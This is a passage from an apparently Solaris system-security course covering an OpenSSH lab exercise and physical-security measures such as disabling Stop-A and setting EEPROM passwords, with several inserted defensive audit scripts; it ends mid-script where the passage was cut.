● Use the Host directive to manage settings. You can make settings globally or make server-specific entries. The Host directive takes a machine name as an argument and restricts all settings (up until the next Host directive, or the end of file) to apply to that server only. You can use the * and ? wildcards in the machine name, and you can specify the default setting using Host *. For example, if the server at pluto.sun.com runs on a non-standard port (the default is 22), you can specify this value by adding the following to the ssh_config file:

Host pluto.sun.com
    Port 8022

Users can override these settings with command line options or their own configuration file.

Note – Ensure that specific Host directives are placed later in the file than the less specific ones. For example, always place the default directives first, otherwise the default directives override the previous ones.
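To make the Host directive and the ordering rule concrete, here is an added example written for this edition (not course code and not the OpenSSH parser). It resolves one option for one host from an ssh_config-style file by the rule stated in the file's own header in Code 16-11, that a value is only changed the first time it is set, so the pluto.sun.com entry above only takes effect when it precedes the Host * defaults. The per-user file and command-line options, which the real client consults before the system-wide file, are left out, and the configuration files are constructed.

```shell
#!/bin/sh
# Added example, not course code: work out the value the OpenSSH client would
# use for one option from an ssh_config-style file. Rules followed: a value is
# only changed the first time it is set; the lines after a Host directive (up
# to the next one) apply only to hosts matching one of its patterns, where *
# and ? are wildcards; keywords are case-insensitive.

# host_matches HOST PATTERN... -> true if HOST matches any PATTERN
host_matches() {
    h=$1; shift
    for p in "$@"; do
        case $h in $p) return 0 ;; esac      # unquoted $p is used as a glob pattern
    done
    return 1
}

# ssh_option FILE HOST OPTION -> prints the effective value; prints nothing and
#   returns 1 if the file never sets OPTION for HOST.
ssh_option() {
    file=$1; host=$2
    want=$(printf '%s' "$3" | tr 'A-Z' 'a-z')
    in_scope=1                               # lines before any Host apply to every host
    while read -r kw rest; do
        case $kw in ''|'#'*) continue ;; esac
        lkw=$(printf '%s' "$kw" | tr 'A-Z' 'a-z')
        if [ "$lkw" = host ]; then
            set -f; set -- $rest; set +f     # split the patterns, keeping * and ? literal
            if host_matches "$host" "$@"; then in_scope=1; else in_scope=0; fi
            continue
        fi
        [ "$in_scope" -eq 1 ] || continue
        if [ "$lkw" = "$want" ]; then
            printf '%s\n' "$rest"            # first setting wins, so stop here
            return 0
        fi
    done < "$file"
    return 1
}

# Demonstration: the order the file header asks for (specific entries first,
# defaults last) versus the reverse, using constructed configuration files.
tmp=$(mktemp -d)
cat > "$tmp/good" <<'EOF'
Host pluto.sun.com
    Port 8022
Host *.sun.com
    Cipher blowfish
Host *
    Port 22
    Cipher 3des
    StrictHostKeyChecking yes
EOF
cat > "$tmp/reversed" <<'EOF'
Host *
    Port 22
Host pluto.sun.com
    Port 8022
EOF
for h in pluto.sun.com mars.sun.com grommit; do
    printf '%-14s Port=%-5s Cipher=%s\n' "$h" \
        "$(ssh_option "$tmp/good" "$h" Port)" "$(ssh_option "$tmp/good" "$h" cipher)"
done
# prints: pluto.sun.com Port=8022 Cipher=blowfish
#         mars.sun.com  Port=22   Cipher=blowfish
#         grommit       Port=22   Cipher=3des
printf 'reversed file: pluto.sun.com Port=%s\n' \
    "$(ssh_option "$tmp/reversed" pluto.sun.com Port)"
# prints: reversed file: pluto.sun.com Port=22   (Host * came first and won)
rm -rf "$tmp"
```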

Exercise: Using Secure Shell

In this exercise, you complete the following tasks:

● Install, configure, and use the secure shell

● Verify that transmissions sent by a user using the ssh program are encrypted

● Configure client keys

● Use the ssh-agent program to manage passphrases

Preparation

Ensure that any host access control set up in the files /etc/hosts.allow and /etc/hosts.deny is disabled (in other words, remove these two files).

Task – Using Secure Shell

Work in pairs to install a minimal configuration of the secure shell on a server and a client.

Task – Installing OpenSSH

You can download OpenSSH from the Sun Freeware Web site; see "Additional Resources" on page 16-3. A copy has already been downloaded and saved in the /usr/local/pkg directory. Install this SVR4 package using the pkgadd command. You also must install the OpenSSL library, which is available from the same Web site and in the /usr/local/pkg directory.

Task – Using OpenSSH

In the next steps, you create the host key for the secure shell server. Similar steps are taken for creating keys for individual users, except that the file locations are different, and the server does not use a passphrase with a key.

To create the host key:

1. As the root user on the server, use the ssh-keygen command to generate the keys for the server. Use the default directory for the key location for this exercise. Press the Enter key when prompted for a passphrase.

2. When the host key has been generated, start the secure shell server daemon. Start it in debug mode with the sshd -d command. Ignore any error messages regarding DSA host keys.

3. On the server and client machines, identify two user accounts to use with the secure shell. The account name and shell type do not matter, although the following examples use the names alice and bob.

4. On the client machine, use the su command to change to user alice.

5. From the client machine, use the ssh command to connect to the server as user bob.

6. If the command succeeded, the OpenSSH server is running correctly. Restart the sshd program (on the server machine), this time without the debug flag. Use the ps program to ensure that the server is running.

Task – Checking Secure Shell Encryption

To check encryption:

1. On the client machine, log in as user alice. To test the encryption of the secure shell, verify that you can view clear text on the network by using the snoop command as the root user in another window. Log user alice out of the rlogin session but leave the snoop command running in the other window.

2. From the client machine, use the ssh command to connect to the server. Watch the window running the snoop command to see if the connection is encrypted. When you are prompted for an answer to a yes or no question, type the full word. You must also enter the correct passphrase for the new user on the remote system.

Task – Configuring Client Keys

To configure client keys:

1. From the client, use the ssh program to run a command on the server. Run the command who to see the logged on users on the server. Add 2>/dev/null to the command to remove the environment variables from the output.

2. From the client, use the scp program to copy user alice's identity.pub file to the /tmp directory on the server. Use 2>/dev/null to remove the environment variables from the output.

3. From the server, add the identity.pub file you just copied to the /tmp directory to user bob's authorized_keys file.

4. From user alice on the client machine, log in to the server as user bob. Do this without using bob's passphrase. Use the access granted from bob's authorized_keys file.

Task – Using the ssh-agent Program

To use the ssh-agent program:

1. Run the ssh-agent program to configure your shell so that it has access to the keys:

# eval `ssh-agent`

2. List the identities now available to the ssh-agent program.

3. Add a new identity to the agent.

4. List the identities now available.

5. Connect to another machine as user bob. You do not need to enter the passphrase for the required key, because it is supplied by the ssh-agent program.

6. If you have time, configure the client as a server and repeat the exercises in reverse order.

Exercise Summary


Discussion – Take a few minutes to discuss what experiences, issues, or discoveries you had during the lab exercise.

● Experiences

● Interpretations

● Conclusions

● Applications

Exercise Solutions

This section provides the solutions for the exercises in this module.

Installing OpenSSH

Install OpenSSH using pkgadd . You also must install the OpenSSL library.

# cd /usr/local/pkg
# pkgadd -d openssl-0_9_6-sol8-sparc-local
# pkgadd -d openssh-2_5_1p1-sol8-sparc-local

Using OpenSSH

1. As the root user on the server, use the ssh-keygen command to generate the keys for the server. Use the default directory for the key location for this exercise. Press the Enter key when prompted for a passphrase.

# ssh-keygen -f /etc/ssh_host_key
Generating RSA keys:  Key generation complete.
Enter passphrase (empty for no passphrase): <enter>
Enter same passphrase again: <enter>
Your identification has been saved in /etc/ssh_host_key.
Your public key has been saved in /etc/ssh_host_key.pub.
The key fingerprint is:
bf:b3:a6:8e:2d:b1:86:63:64:44:b4:6f:52:cc:7e:42 root@jeeves

2. When the host key has been generated, start the secure shell server daemon. Start it in debug mode with the sshd -d command. Ignore any error messages regarding DSA host keys.

# /usr/local/bin/sshd -d
debug: sshd version OpenSSH_2.2.0
error: Could not load DSA host key: /etc/ssh_host_dsa_key
Disabling protocol version 2
debug: Bind to port 22 on ::.
Server listening on :: port 22.
debug: Bind to port 22 on 0.0.0.0.
Server listening on 0.0.0.0 port 22.
Generating 768 bit RSA key.
RSA key generation complete.
...

3. On the server and client machines, identify two user accounts to use with the secure shell. The account name and shell type do not matter, although the following examples use the names alice and bob.

4. On the client machine, use the su command to change to user alice:

# su - alice
Password: password
%

5. From the client machine, use the ssh command to connect to the server as user bob:

% ssh -l bob grommit
bob@grommit's password: password
Sun Microsystems Inc.   SunOS 5.6       Generic August 1997

6. If the command succeeds, the OpenSSH server is running correctly. Restart the sshd program (on the server machine), this time without the debug flag. Use the ps program to ensure that it is running:

# /usr/local/bin/sshd
# ps -ef | grep sshd

root 1630 1 29 12:01:50 ? 0:08 /usr/local/bin/sshd

Checking Secure Shell Encryption

1. On the client machine, log in as user alice .

login: alice
Password:
Sun Microsystems Inc.   SunOS 5.7       Generic August 1998

To test the encryption of the secure shell, verify that you can view clear text on the network by using the snoop command as the root user in another window. Log user alice out of the rlogin session but leave the snoop command running in the other window:

# snoop
Using device /dev/hme
      wallace -> grommit      RLOGIN C port=1023
.............

Open another window, and use the rlogin command to log in to the server:

login: alice
Password:
Sun Microsystems Inc.   SunOS 5.6       Generic August 1997
$ rlogin grommit
Password:
Sun Microsystems Inc.   SunOS 5.6       Generic August 1997
$ ls
local.cshrc     local.login     local.profile
$ exit
Connection closed.
$

You should see the clear text in the window running the snoop command.

2. From the client machine, use the ssh command to connect to the server. Watch the window running the snoop command to see if the connection is encrypted. When you are prompted for an answer to a yes or no question, type the full word. You must also enter the correct passphrase for the new user on the remote system.

$ ssh grommit
The authenticity of host 'jeeves' can't be established.
RSA key fingerprint is bf:b3:a6:8e:2d:b1:86:63:64:44:b4:6f:52:cc:7e:42.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'jeeves' (RSA) to the list of known hosts.
alice@jeeve's password: <enter password>
Last login: Sat May 12 20:49:42 2001 from wallace
Sun Microsystems Inc.   SunOS 5.6       Generic August 1997
$ ls
local.cshrc     local.login     local.profile

The window running the snoop command should not be displaying clear text any longer, proving that the connection is encrypted between the client and server.

Configuring Client Keys

1. From the client, use the ssh program to run a command on the server. Run the who command to see the logged on users on the server. Add 2>/dev/null to the command to remove the environment variables from the output.

$ ssh grommit who 2>/dev/null
alice@grommit's password: <enter password>
bob        ttyp0        May 11 14:00    (195.64.77.11)

2. From the client, use the scp program to copy user alice's identity.pub file to the /tmp directory on the server. Use 2>/dev/null to remove the environment variables from the output.

$ scp .ssh/identity.pub grommit:/tmp/ 2>/dev/null
alice@grommit's password: <enter password>
identity.pub    100%|************************************************|   344    00:00

3. From the server, add the identity.pub file you just copied to the /tmp directory to user bob's authorized_keys file.

% cp /tmp/identity.pub /home/bob/.ssh/authorized_keys

4. From user alice on the client machine, log in to the server as user bob. Do this without using bob's password. Use the access granted from bob's authorized_keys file.

$ ssh -l bob grommit
Enter passphrase for RSA key 'alice@wallace': <enter passphrase>
Last login: Sat May 12 21:05:46 2001 from wooster
Sun Microsystems Inc.   SunOS 5.6       Generic August 1997
% id
uid=1067(bob) gid=1067 groups=1067

Using the ssh-agent Program

1. Run the ssh-agent program with sh as the command to execute (so that this shell has access to the keys):

% ssh-agent sh

2. List the identities now available to ssh-agent :

% ssh-add -l
The agent has no identities.

3. Add a new identity to the agent:

% ssh-add
Need passphrase for /export/home/alice/.ssh/identity
Enter passphrase for alice@wooster: <enter passphrase>
Identity added: /export/home/alice/.ssh/identity (alice@wallace)

4. List the identities now available to ssh-agent :

% ssh-add -l
1024 49:4b:13:bb:6f:8e:46:d1:cd:f2:33:5b:04:99:bb:bd alice@wallace

5. Connect to another machine as user bob . You do not need to enterthe passphrase for the required key, because it is supplied by thessh-agent program.

% ssh -l bob grommit
Last login: Tue May 15 16:18:22 2001 from wallace
% id
uid=1067(bob) gid=1067 groups=1067
%

Module 17

Securing Physical Access

Objectives

Upon completion of this module, you should be able to explain and use measures to physically secure a system. Specifically, you should be able to:

● Justify the need for physical system security and define measures that enhance the physical system security

● Explain the potential weak points in a physical network

● Disable the STOP-A key

● Explain the role of the EEPROM password and security modes

Relevance


Discussion – All IT equipment is a potential target for a physical attack, both intentional and unintentional; fire, floods, and other emergencies have no respect for controlled access to data centers.

● What harm can be done to a system or its data if an intruder can physically access the machine?

● Is it only the computer that needs to be physically protected?

Additional Resources

Additional resources – The following references provide additional information on the topics described in this module:

● Schneier, Bruce. Secrets & Lies. John Wiley & Sons, 2000.

● Scambray, McClure, Kurtz. Hacking Exposed. Osborne McGraw-Hill, 2001.

● Garfinkel, Simson and Gene Spafford. Practical UNIX & Internet Security. O'Reilly & Associates, Inc. 1996.

● Online manual pages for boot(1M), eeprom(8), kernel(1M), monitor(1M), and system(4).

● Solaris OE Answerbook 2.

Assessing the Risk From Physical Intrusion

Modern computer networks are complex environments that have a number of vulnerabilities. Not all attacks are launched by distant intruders. People with physical access to the systems and networks might also attempt to access data or impair functionality, for a variety of reasons.

Although it might seem more of a problem for military systems, physical security is also important for commercial systems because:

● The potential rewards from successful commercial espionage can run into millions of dollars.

● Commercially sensitive data is held on machines both in the data center and in any office connected to the network.

● Commercially sensitive data is carried along the wires of the network.

Physical Intrusion Solutions

Solutions to physical intrusion onto a network are similar to those applied to the computers themselves:

● Be aware of the potential for physical intrusion into the network.

● Control physical access to all IT equipment.

● Encrypt data sent over the network, especially if it is at all sensitive.

Types of Physical Intrusion

The types of physical intrusion can be classified as follows:

● Console access – An intruder gains direct access to the system by sitting at the console. This problem arises:

● When sessions are left logged in

● When post-its with passwords written on them are left around the workstation

● On systems (such as Microsoft Windows 98) that do not require passwords for access

● Damage to systems – An intruder with physical access can damage a system and leave it inoperable.

● Data theft – Backup tapes or other removable media are stolen. An intruder could even remove parts of a system containing data, such as hard drives.

● Power outage – An intruder interferes with the supply of power to systems and networks, causing a DoS attack. A sudden switching-off of servers, routers, or other components is potentially as damaging as physically destroying the network.

● Network tapping – An intruder with physical access to the network monitors internal network traffic without having to defeat a firewall.

As with any risk, you must strike a balance between the likelihood of attack and the cost of preventative measures.

Securing IT Equipment

Physical access to all IT equipment should be restricted to as few people as possible and only to authorized personnel. While this should be possible for servers, it is difficult, if not impossible, to enforce for workstations (including PCs and laptop PCs).

Place all servers in restricted-access machine rooms or rooms that can be locked, and control who has access to those locations.

Where practical, put the workstation systems into locked cupboards and only give users access to the screen, keyboard, and mouse. Use extension cables for the peripheral equipment to facilitate this configuration. Consider removing or disabling removable media devices, such as diskettes, CD-ROMs, tape backup, DVDs, and even the parallel port on PCs, which can be used with portable disks and tape devices such as Iomega Zip drives.

Note – It has been known for a site to use superglue to prevent diskette devices from being used.

Use low-level EEPROM or BIOS security to enable administrator passwords for all unsecured equipment, to ensure that only password holders can reboot systems into a maintenance or administration mode. Using passwords with SPARC equipment prevents an unauthorized user from booting the Solaris OE into single-user mode, which gives the user root access.

Remember that users might have access to installation media and hardware diagnostic media which they can use to bypass some (or all) of the security measures in place, unless you prevent physical access to the system devices.

Implementing Physical Network Security

Network security is a vast and complex area due to the sheer scale of modern networks. Some of the network areas that must be secured are:

● Local Area Network (LAN)

● Routers

● Firewalls

● Wide Area Network (WAN)

● Physical cabling inside your organization’s buildings

● Physical cabling used by telecommunications companies

● Microwave transmissions as an alternative to physical cabling

● Satellite communications

Securing Network Infrastructure

This subject is too broad and specialized to be presented in this course. However, there are some techniques that you can use within your organization to remove some of the more obvious threats:

● Only allow authorized systems to connect to your network.

Do not allow consultants or contractors to use their own equipment to access the network. Always provide them with a system to use that you have properly secured.

● Always use star network topologies connecting all systems individually back to a hub.

Do not use thick or thin Ethernet cabling because it is easy to tap into.

● Only connect required ports when using structured wiring systems.

Do not leave unused live ports in user-accessible areas, because unknown equipment can be plugged into these ports.

● Audit the physical cables into hubs, switches, and routers on a regular basis.

All networks should have an approved network diagram, so that you can check what is present against what should be present.

● Use a monitored hub.

● Use hubs that report—usually by means of a separate serial link—on the status of their ports. While primarily intended as a means of network troubleshooting, they also provide a valuable tool for security monitoring.

● Ask users to leave all computers switched on at all times and poll the computers on a regular basis to verify their identity. Use the low-level MAC address on the network card and maintain a database of port to MAC address mappings to detect inconsistencies.

● Laptops are a problem area because you would not expect them to be left in the office overnight, but it is still possible to verify whether a MAC address is that of a known machine. Laptop users can also change network PC cards that have different MAC addresses. It is better to have a few false alarms than an intruder attacking your network.

● Always lock communications rooms containing hubs, routers, patch panels, and other network infrastructure.

● Do not allow users to plug into hubs or change patch panel settings.

● Try to use fiber optic cables if possible.

It is a lot harder to tap into a fiber cable than an electrical cable.
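The port audit and the port-to-MAC database described above can be automated. The following script is an added example and is not part of the course material: it compares a polled "port MAC" table with an approved inventory and reports unknown equipment, live ports that should be unpatched, known cards that have moved (the laptop case), and expected hosts that were not seen. The inventory format, the poll format, and every address and host name are constructed for illustration.

```python
"""Audit a polled hub/switch port table against the approved port-to-MAC
inventory.

Added example, not part of the SC-300 course material. The inventory
format, the polled-table format, and every address and host name below are
constructed for illustration.
"""

# Approved inventory from the network diagram: port -> (MAC, description).
# A MAC of None marks a port that should not be patched to anything.
APPROVED = {
    "hub1/1": ("08:00:20:aa:bb:01", "ws-eng-01"),
    "hub1/2": ("08:00:20:aa:bb:02", "ws-eng-02"),
    "hub1/3": ("00:60:08:cc:dd:03", "laptop-sales-07 (PC card)"),
    "hub1/4": (None, "spare, should be unpatched"),
}

# What a regular poll of the hub reported: one "port mac" line per active
# port. Constructed sample; note the upper-case MAC and the two anomalies.
OBSERVED = """\
hub1/1 08:00:20:AA:BB:01
hub1/2 00:60:08:cc:dd:03
hub1/4 00:10:4b:ee:ff:99
"""


def normalize_mac(mac):
    """Canonical lower-case, colon-separated form, so that vendor output
    such as '0800.20AA.BB01' or '08-00-20-aa-bb-01' compares equal."""
    hexdigits = "".join(ch for ch in mac.lower() if ch in "0123456789abcdef")
    if len(hexdigits) != 12:
        raise ValueError("not a 48-bit MAC address: %r" % (mac,))
    return ":".join(hexdigits[i:i + 2] for i in range(0, 12, 2))


def parse_observed(text):
    """Parse 'port mac' lines into {port: normalized_mac}."""
    table = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        port, mac = line.split()
        table[port] = normalize_mac(mac)
    return table


def audit_ports(approved, observed):
    """Compare the poll with the inventory and return sorted
    (severity, port, message) findings."""
    known = {normalize_mac(mac): port
             for port, (mac, _desc) in approved.items() if mac}
    findings = []
    for port, mac in observed.items():
        if port not in approved:
            findings.append(("ALERT", port,
                             "active port missing from network diagram, MAC %s" % mac))
            continue
        expected, desc = approved[port]
        if expected is None:
            findings.append(("ALERT", port,
                             "port marked '%s' is live with MAC %s" % (desc, mac)))
        elif mac != normalize_mac(expected):
            if mac in known:
                # A known card on the wrong port: a moved laptop or a
                # re-patched cable. Worth a look, but less alarming.
                findings.append(("WARN", port,
                                 "known MAC %s (%s) moved here from %s"
                                 % (mac, approved[known[mac]][1], known[mac])))
            else:
                findings.append(("ALERT", port,
                                 "unknown MAC %s, inventory expects %s (%s)"
                                 % (mac, expected, desc)))
    # Hosts the diagram expects but the poll did not see. This is why the
    # text asks users to leave machines switched on.
    for port, (expected, desc) in approved.items():
        if expected and port not in observed:
            findings.append(("INFO", port, "%s not seen on its port" % desc))
    return sorted(findings)


if __name__ == "__main__":
    for severity, port, message in audit_ports(APPROVED, parse_observed(OBSERVED)):
        print("%-5s %-7s %s" % (severity, port, message))
```

Run against the constructed sample, the script flags the live spare port hub1/4 as an alert, the sales laptop appearing on hub1/2 as a warning, and ws-eng-02 missing from its port as informational; tune the severities to your own tolerance for false alarms.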

Appraising the Risk of Eavesdropping

One final consideration is the electrical equipment itself. All electrical cables leak a certain amount of electromagnetic radiation which can be detected by specialized monitoring equipment (essentially a sophisticated radio receiver). This eavesdropping equipment is expensive but can work at a range of a few hundred yards (meters).

Some products can pick up monitor screen radiation and reconstruct the screen image in real time. Some movement detectors can track key presses and mouse movements remotely.

The central processing unit (CPU) in a server or workstation is also vulnerable. The type of electromagnetic signal generated by the processor, when performing what is known as “big number” arithmetic, is highly characteristic and can be scanned. It is possible to analyze the signal and reconstruct the content of the registers at the time of the scan, thereby providing the exact numbers used in the encryption engine.

This might sound like science fiction but these products exist and they are used. They might not be 100 percent accurate, cheap, or easy to use but, given time and development, they will become foolproof. The film Entrapment (Twentieth Century Fox, 1999) showed how physical monitoring can gather sensitive information as part of a plot to break into a multi-national banking system. This might be a fictional plot line, but do not assume that it cannot happen in the real world. Attacks of this nature have been made.

The solution to these forms of attack is to audit the location of the sensitive device (monitor, CPU, and so on). Establish the level of risk and, if necessary, “screen” off electromagnetic radiation with a Faraday cage, that is, an earthed “box” of a conductive material to absorb the emitted electromagnetic radiation.

Note – In the nineteen eighties, the U.S. government developed a certification system called TEMPEST which rates computer equipment’s susceptibility to radio eavesdropping. It is now possible for rooms and even whole buildings to be TEMPEST certified.

How Secure Is Your Network?

With regard to your own offices, consider the following:

● How many of the computer screens and keyboards can be seen through windows from nearby buildings?

● Do any of your network cables run within 100 yards of a road, parking lot, park, shop, or anywhere else where the public can legitimately walk by or stop?

Using Encryption

The pessimistic way of looking at data security is to assume that all physical security is compromised and that data can be read by anyone. Encryption provides a fallback for ensuring that sensitive data is only accessible to authorized personnel.

It must be understood that there is no such thing as unbreakable encryption. Any current crypto-system can be analyzed given enough time. It is the aim of the cryptographer to lengthen that timespan. Nevertheless, some commercial crypto-systems are so effective that it would take decades or even centuries to crack them.

The case for and against encryption can be summarized as follows:

● Benefits of encryption:

● Data is secured from unauthorized access, even when made public.

● Data is easily restricted by key management on a need-to-know basis.

● Problems associated with encryption:

● The additional encryption layer slows data access.

● Keys must be managed and kept secure. A key that becomes known is no longer secure.

● If the decryption key is lost, the related data is also lost.

Strengthening Help Desk Processes

The most common form of a security break-in is when an intruder phones the help desk or an administrator and asks for the password on an account to be reset. As long as the intruder knows a valid account name, this attack succeeds more times than it fails.

As a result, many help desks implement safeguards to ensure that the user requesting the password change is the owner of the account. That is, they authenticate the user who is requesting the change.

User Authentication Techniques

The following is a list of some common user-authentication techniques, along with their disadvantages:

● Ask users to physically go to a help desk to be verified:

● Help desk staff might not know every person by sight.

● Even when this approach is backed up with the use of user ID badges, ID badges can be falsified or stolen.

● Users and the help desk might not be located within close proximity of each other.

● Ask users to supply additional identification information such as a personnel number or a passphrase created when the user’s account was created:

● This form of additional data can easily be discovered by listening to a valid user talking to the help desk, or by browsing company documentation.

● Passphrases must be memorable to users (and therefore guessable by intruders), and they must be stored somewhere where they can be accessed by help desk staff, thereby compounding the security risk.

● Ask users to email requests from another system:

● Not all users have accounts on more than one system, and networks based on NIS+, Microsoft Windows NT, Netware, or Kerberos effectively use single network login mechanisms to access all systems.

● SMTP email can be easily spoofed.

● Ask users to submit a written request signed by their supervisor or manager. Intruders can forge the written request, so help desk staff must then contact the supervisor concerned and verify authorization of the password change. This is a slow process (supervisors might be in meetings) which penalizes legitimate users who cannot continue working while the password is being reset.

● Confirm user identity by phoning the user back on their known extension (or mobile phone):

● Intruders might be at the user’s desk or have borrowed the user’s phone.

● Genuine users might not be able to get to their usual phone.

● Not all users have individual phones, and often a supervisor must be contacted instead of the user.

● Phones can use redirection and call-forwarding to transparently route the call to any other phone.

● Use a trusted third party, such as a supervisor or manager, to make the request and receive the password:

● The trusted third party still has to be authenticated.

● This solution reduces the number of users who can ask for password changes, which can slow operations in a large organization.

Regrettably, there is no effective solution to the problem of authenticating user identity. Nevertheless, any of the above precautions are better than having none in place at all.

Applying Physical Security Measures

Any software security system that can be started on a machine can also be stopped. This is the major weakness of software security. Securing physical access to a workstation or server is, therefore, every bit as important as taking software measures.

The Stop-A Key

On hardware based on SPARC technology, the OpenBoot utility interacts with the hardware to control access to the system. From the point of view of security, the most serious risk of intrusion is the Stop-A key combination. If the Stop key and the A key are held down at the same time on the keyboard of the physical machine (not from a terminal), all Solaris OE activity is suspended and the system returns to the command monitor (OpenBoot).

From the OpenBoot monitor a user can:

● Reboot the system in single-user mode, gaining access to the system as the root user.

● Examine memory contents, potentially picking up key information. Many files are cached in memory and it is quite likely that the /etc/shadow information can be found.

● Load data from physical devices, allowing the user access to any file on the disk, bypassing all security checks.

Disabling the Stop-A Key

Disable the Stop-A key by adding the following line to the /etc/system file:

set abort_enable = 0

Remove this line or set it as follows to enable the Stop-A key:

set abort_enable = 1

Alternatively, uncomment the following entry in the /etc/default/kbd file:

KEYBOARD_ABORT=disable

Reboot the system after changing the /etc/system or /etc/default/kbd files because these files are only read when the system boots up.
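Because the two settings live in two files with different comment conventions (`*` in /etc/system, `#` in /etc/default/kbd), it is easy to believe Stop-A is disabled when the line is still commented out or has been overridden further down. The following checker is an added example, not part of the course material; it parses file contents passed in as strings so that it can be run anywhere, and the sample file contents are constructed.

```python
"""Report whether the Stop-A (keyboard abort) sequence is configured off,
using the two settings described in the text: `set abort_enable = 0` in
/etc/system and `KEYBOARD_ABORT=disable` in /etc/default/kbd.

Added example, not part of the SC-300 course material. File contents are
passed in as strings; the samples below are constructed.
"""
import re

SYSTEM_ABORT_RE = re.compile(r"^\s*set\s+abort_enable\s*=\s*(\d+)\s*$")
KBD_ABORT_RE = re.compile(r"^\s*KEYBOARD_ABORT\s*=\s*(\w+)\s*$")

# Constructed samples of the two files, hardened and default.
SYSTEM_HARDENED = "* Console hardening for this workstation\nset abort_enable = 0\n"
SYSTEM_DEFAULT = "* set abort_enable = 0   <- still commented out, so still enabled\n"
KBD_HARDENED = "KEYBOARD_ABORT=disable\n"
KBD_DEFAULT = "# KEYBOARD_ABORT affects the default behavior of the keyboard abort\n#KEYBOARD_ABORT=enable\n"


def abort_enable_from_system(text):
    """Effective abort_enable value from /etc/system content, or None if
    it is not set. Lines starting with '*' are comments there, and the
    last uncommented setting wins because the kernel applies them in order."""
    value = None
    for line in text.splitlines():
        if line.lstrip().startswith("*"):
            continue
        m = SYSTEM_ABORT_RE.match(line)
        if m:
            value = int(m.group(1))
    return value


def keyboard_abort_from_kbd(text):
    """KEYBOARD_ABORT value from /etc/default/kbd content ('#' starts a
    comment), or None if the entry is absent or still commented out."""
    value = None
    for line in text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        m = KBD_ABORT_RE.match(line)
        if m:
            value = m.group(1).lower()
    return value


def stop_a_disabled(system_text, kbd_text):
    """True if either mechanism turns the abort sequence off."""
    return (abort_enable_from_system(system_text) == 0
            or keyboard_abort_from_kbd(kbd_text) == "disable")


def check_files(system_path="/etc/system", kbd_path="/etc/default/kbd"):
    """Convenience wrapper for running on a live Solaris host."""
    with open(system_path) as f:
        system_text = f.read()
    with open(kbd_path) as f:
        kbd_text = f.read()
    return stop_a_disabled(system_text, kbd_text)


if __name__ == "__main__":
    for name, sys_t, kbd_t in [("hardened", SYSTEM_HARDENED, KBD_DEFAULT),
                               ("default", SYSTEM_DEFAULT, KBD_DEFAULT),
                               ("kbd only", SYSTEM_DEFAULT, KBD_HARDENED)]:
        print("%-9s Stop-A disabled: %s" % (name, stop_a_disabled(sys_t, kbd_t)))
```

The checker reports the configured state only; as the text says, the files are read at boot, so a host edited but not yet rebooted still has Stop-A live until the next restart.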

Enabling EEPROM Security

Workstations are generally contained in reasonably secure areas, even if only in an office. However, there are circumstances in which it is advisable to further protect against physical access to a system. You could use some form of physical keyboard lock. You could also consider the option of EEPROM password control.

If an intruder has access to low-level firmware software (the EEPROM monitor), they can alter low-level system functionality. They could bring the system to a low run level, then make alterations to the kernel or programmable read-only memory (PROM) level functions. To do this, the intruder must be physically at the computer that they are attempting to break into. In addition to physical presence, this type of attack also requires significant knowledge of the system concerned. Nevertheless, this type of attack could be a security concern.

Note – Most manufacturers provide a means of changing EEPROM data. This can differ from one type of hardware to another, and great care must be taken not to corrupt a system accidentally. The following technique discusses the OpenBoot utility and is applicable only to hardware based on SPARC technology. Check with your hardware vendor before using this technique.

Hardware based on SPARC technology provides a security lock at the EEPROM level. Set the security level from the OpenBoot prompt (EEPROM level) or by using the eeprom(1m) command.

By using the eeprom command with the proper options, you can assign a password and security level to the machine. After issuing the command, reset the system. From then on, a password is required each time to perform specific commands when the system has been brought to the OpenBoot (EEPROM) prompt.

OpenBoot runs in two modes:

● Full access, where all commands are available

● Restricted access, where only the c (continue), b (boot), and n (none) commands are available for returning to full access

There are three levels of EEPROM security:

● none – Full access to the OpenBoot where any command can be typed and no password is required.

● command – Restricted access, where the user can use the c or b commands without a password. A password is required if the user wants to use the n command to return to full access, or if a parameter is used with the b command (for example, to boot single-user mode).

● full – Restricted access where all commands except c require a password.

Warning – Do not attempt to change the EEPROM during this course. If for any reason the password is forgotten or unavailable, the computer is rendered useless. To remedy the situation, the EEPROM device should be physically removed from the system and reprogrammed.

EEPROM Passwords

To set the EEPROM security mode to command, use the following command:

# eeprom security-mode=command

When the EEPROM security mode is set to a value other than none, set the security password with:

# eeprom security-password=
Changing PROM password:
New password: ******
Retype new password: ******

If you enter an incorrect password, the system delays for approximately 10 seconds before displaying the boot prompt again.

The number of times that an incorrect password is entered is stored in the security-#badlogins variable of the non-volatile random access memory (NVRAM). Check the value of this parameter to see if someone has attempted to use the EEPROM monitor without knowing the password.

Use the command below to check the number of login attempts:

# eeprom security-#badlogins
security-#badlogins=0
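Checking this counter by hand on every SPARC host does not scale, so the check is worth scripting. The following is an added example, not part of the course material: it takes the text output of eeprom(1M) (which only runs on SPARC hardware, so the sample output here is constructed) and flags a security-mode of none and any non-zero security-#badlogins count.

```python
"""Evaluate the OpenBoot security settings discussed in the text from the
output of eeprom(1M): warn when security-mode is none and alert when
security-#badlogins shows failed password attempts.

Added example, not part of the SC-300 course material. eeprom runs only
on SPARC hardware, so the function takes the command's output as text and
the sample output below is constructed.
"""

# Constructed samples of `eeprom security-mode security-#badlogins` output.
EEPROM_OK = "security-mode=command\nsecurity-#badlogins=0\n"
EEPROM_SUSPECT = "security-mode=command\nsecurity-#badlogins=3\n"
EEPROM_OPEN = "security-mode=none\nsecurity-#badlogins=0\n"


def parse_eeprom(text):
    """Turn 'name=value' lines from eeprom into a dict. Lines without '='
    (eeprom prints an informational message for parameters the PROM does
    not hold, and never prints the password itself) are skipped."""
    params = {}
    for line in text.splitlines():
        line = line.strip()
        if "=" not in line:
            continue
        name, _, value = line.partition("=")
        params[name.strip()] = value.strip()
    return params


def assess_eeprom_security(params):
    """Return a list of (level, message) findings for the security
    parameters; an empty list means nothing to report."""
    findings = []
    mode = params.get("security-mode", "none")
    if mode == "none":
        findings.append(("WARN", "security-mode is none: any OpenBoot command "
                                 "can be run without a password"))
    elif mode not in ("command", "full"):
        findings.append(("WARN", "unexpected security-mode %r" % (mode,)))
    raw = params.get("security-#badlogins", "0")
    try:
        bad = int(raw)
    except ValueError:
        bad = 0
        findings.append(("WARN", "security-#badlogins unreadable: %r" % (raw,)))
    if bad > 0:
        # Someone reached the OpenBoot prompt and guessed wrong: physical
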